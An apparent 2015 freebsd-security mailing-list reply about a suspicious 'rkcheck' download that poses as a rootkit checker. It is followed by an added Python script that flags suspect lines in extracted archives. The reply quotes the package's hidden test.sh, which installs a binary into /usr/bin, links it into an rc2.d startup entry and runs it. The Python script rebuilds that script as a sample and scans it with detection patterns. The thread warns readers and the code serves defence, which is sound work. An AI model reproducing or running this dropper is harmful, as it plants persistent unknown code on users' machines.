From: Joseph Mingrone
To: Philip Jocks
Cc: freebsd-security@freebsd.org
Subject: Re: has my 10.1-RELEASE system been compromised
Date: Wed, 25 Feb 2015 16:41:19 -0400
Message-ID: <86bnkhyb9s.fsf@gly.ftfl.ca>
In-Reply-To: <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com> (Philip Jocks's message of "Wed, 25 Feb 2015 21:34:21 +0100")
References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> <86k2z5yc03.fsf@gly.ftfl.ca> <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com>
List-Id: "Security issues [members-only posting]"

Philip Jocks writes:

> it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org which
> was registered a few days ago and looks like a tampered version of chkrootkit. I
> hope nobody installed it anywhere, it seems to execute
> rkcheck/tests/.unit/test.sh which contains
>
> #!/bin/bash
>
> cp tests/.unit/test /usr/bin/rrsyncn
> chmod +x /usr/bin/rrsyncn
> rm -fr /etc/rc2.d/S98rsyncn
> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
> /usr/bin/rrsyncn
> exit
>
> That doesn't look like something you'd want on your box...

I downloaded it as well, but also became suspicious (for a variety of reasons) and didn't run it. Fortunately /bin/bash doesn't exist on our systems.

Some evidence to confirm or refute the authenticity of the email reporting our IPs as vulnerable would be helpful.

Joseph
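One way to triage a download like this before running it: walk the extracted archive, flag hidden directories, and grep any shell script for actions a rootkit checker has no business taking on the host. This is an added example, not code from the thread or from chkrootkit; the sample tree it builds is constructed from the script Philip quoted, and the pattern names are assumptions.

```python
import os
import re
import tempfile

# Behaviours seen in the quoted tests/.unit/test.sh. The bash shebang is
# flagged too: base FreeBSD has no /bin/bash, so the script is not written
# for the systems it claims to check.
SUSPECT_PATTERNS = {
    "bash shebang (absent on base FreeBSD)": re.compile(r"^#!/bin/bash"),
    "copies a file into a system bin directory": re.compile(r"\bcp\b.*\s/(usr/)?s?bin/"),
    "marks a file executable": re.compile(r"\bchmod\s+\+x\b"),
    "removes an rc/init entry": re.compile(r"\brm\s+-\w*\s+/etc/rc\d?\.d/"),
    "links into an rc/init directory": re.compile(r"\bln\s+-s\b.*\s/etc/rc\d?\.d/"),
    "executes a freshly installed binary": re.compile(r"^\s*/(usr/)?s?bin/\S+\s*$"),
}

def triage_script(path):
    """Return (line_no, reason, line) findings for one shell script."""
    findings = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for no, line in enumerate(fh, 1):
            for reason, pat in SUSPECT_PATTERNS.items():
                if pat.search(line):
                    findings.append((no, reason, line.rstrip()))
    return findings

def triage_tree(root):
    """Walk an extracted archive; report hidden dirs and suspect scripts."""
    report = {"hidden_paths": [], "findings": {}}
    for dirpath, _, filenames in os.walk(root):
        rel = os.path.relpath(dirpath, root)
        if any(p.startswith(".") for p in rel.split(os.sep) if p != "."):
            report["hidden_paths"].append(rel)
        for name in filenames:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                head = fh.read(2)
            if name.endswith(".sh") or head == b"#!":   # treat as a script
                hits = triage_script(full)
                if hits:
                    report["findings"][os.path.relpath(full, root)] = hits
    return report

def build_sample_tree():
    """Constructed sample: the layout and script quoted in the thread."""
    root = tempfile.mkdtemp(prefix="rkcheck-triage-")
    os.makedirs(os.path.join(root, "tests", ".unit"))
    with open(os.path.join(root, "tests", ".unit", "test.sh"), "w") as fh:
        fh.write("#!/bin/bash\n\ncp tests/.unit/test /usr/bin/rrsyncn\n"
                 "chmod +x /usr/bin/rrsyncn\nrm -fr /etc/rc2.d/S98rsyncn\n"
                 "ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn\n/usr/bin/rrsyncn\nexit\n")
    with open(os.path.join(root, "chkrootkit.sh"), "w") as fh:
        fh.write("#!/bin/sh\necho 'checking...'\n")   # benign control script
    return root
```

Run `triage_tree(build_sample_tree())` to see the hidden `tests/.unit` directory and six flagged lines in `test.sh`, while the benign control script produces no findings.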